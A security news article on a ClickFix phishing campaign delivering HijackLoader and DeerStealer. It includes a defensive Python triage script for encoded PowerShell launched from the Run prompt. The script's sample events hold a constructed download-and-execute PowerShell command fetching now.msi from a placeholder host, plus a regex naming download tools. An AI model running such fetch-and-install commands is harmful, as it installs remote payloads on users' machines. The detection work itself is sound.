Threat Actors Target Victims with HijackLoader and DeerStealer

February 13, 2026

Cybersecurity researchers have observed a new wave of cyber-attacks involving HijackLoader and DeerStealer that uses phishing tactics to lure victims into executing malicious commands.

According to eSentire’s Threat Response Unit (TRU), which discovered the campaign, the attackers use ClickFix as the initial access vector.

Victims are redirected to a phishing page that prompts them to run a PowerShell command via the Windows Run prompt. This command downloads an installer named now.msi, which launches a chain of actions culminating in the execution of HijackLoader and release of the DeerStealer payload.

eSentire said HijackLoader has been active since 2023 and is known for its use of steganography, specifically hiding configuration data in PNG images.

Once executed, the loader exploits legitimate binaries to run unsigned malicious code, ultimately injecting DeerStealer into memory.

DeerStealer’s Expansive Theft Capabilities

DeerStealer, also marketed as XFiles Spyware on dark-web forums by a user named LuciferXfiles, is a subscription-based infostealer with features that go well beyond basic credential theft.

The malware:

  • Extracts data from over 50 web browsers

  • Hijacks 14+ cryptocurrency wallet types via clipboard monitoring

  • Harvests credentials from messengers, FTP, VPN, email and gaming clients

  • Includes hidden VNC for stealthy remote access

  • Uses encrypted HTTPS channels for command-and-control (C2) communication

The malware also features modular obfuscation and virtual machines to decrypt strings, hindering traditional analysis techniques.


Command Line Trickery

The attack begins with the user unwittingly running an encoded command that fetches the installer. 

Though the installer uses a signed binary from COMODO, it loads a manipulated DLL to hijack execution. This altered DLL eventually decrypts the next stage, which injects DeerStealer into another legitimate process.
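
The following added example, which is not taken from eSentire's report or the original article, triages process-creation events for the pattern described above: PowerShell started by explorer.exe (the parent of commands typed into the Run prompt) with an encoded command that decodes to a download. Field names follow Sysmon Event ID 1; the events, host names, URL and agent path are constructed for illustration.

```python
import base64
import re

ENC_ARG = re.compile(r"[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_HINTS = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|downloadfile|downloadstring|"
    r"start-bitstransfer|msiexec|\.msi\b", re.I)

def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand script, or None if absent or invalid."""
    for flag, blob in ENC_ARG.findall(command_line):
        flag = flag.lower()
        # PowerShell accepts any prefix of -EncodedCommand, plus the alias -ec.
        if not ("encodedcommand".startswith(flag) or flag == "ec"):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:  # bad base64 or not UTF-16LE text
            continue
    return None

def triage(events):
    """Flag encoded PowerShell whose parent is explorer.exe (Run prompt, Start menu)."""
    findings = []
    for ev in events:
        image = ev["Image"].lower().rsplit("\\", 1)[-1]
        parent = ev["ParentImage"].lower().rsplit("\\", 1)[-1]
        if image not in ("powershell.exe", "pwsh.exe") or parent != "explorer.exe":
            continue
        script = decode_encoded_command(ev["CommandLine"])
        if script is None:
            continue
        severity = "high" if DOWNLOAD_HINTS.search(script) else "review"
        findings.append({"host": ev["Computer"], "severity": severity, "script": script})
    return findings

def encode_sample(script):
    """Build a constructed -enc argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
FETCH = "Invoke-WebRequest https://example.invalid/now.msi -OutFile now.msi; msiexec /i now.msi"
SAMPLE_EVENTS = [  # constructed events, not real telemetry
    {"Computer": "WS-01", "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -enc " + encode_sample(FETCH)},
    {"Computer": "WS-02", "ParentImage": r"C:\Program Files\Agent\agent.exe", "Image": PS,
     "CommandLine": "powershell.exe -EncodedCommand " + encode_sample("Get-Service")},
    {"Computer": "WS-03", "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"Computer": "WS-04", "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": "powershell.exe -e " + encode_sample("Get-Date")},
]
```

Calling `triage(SAMPLE_EVENTS)` flags WS-01 as high and WS-04 for review; the agent-launched and plain `-File` invocations are ignored.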


Although public tools are available to decode HijackLoader’s configuration, attackers continue using the same methods, indicating either ignorance or disregard for detection risks.

Expanding Threat, Evolving Tools

eSentire warned that DeerStealer is continuously evolving, with upcoming features to include macOS support, AI-driven enhancements and additional client targets.

Threat actors who subscribe to higher pricing tiers – up to $3000 per month – receive extras such as re-encryption, payload signing and advanced customization.

As these tools become more sophisticated, defenders must remain alert.

eSentire’s TRU recommends continuous threat monitoring and updating endpoint protection mechanisms to detect emerging loaders and stealers before any damage is done.
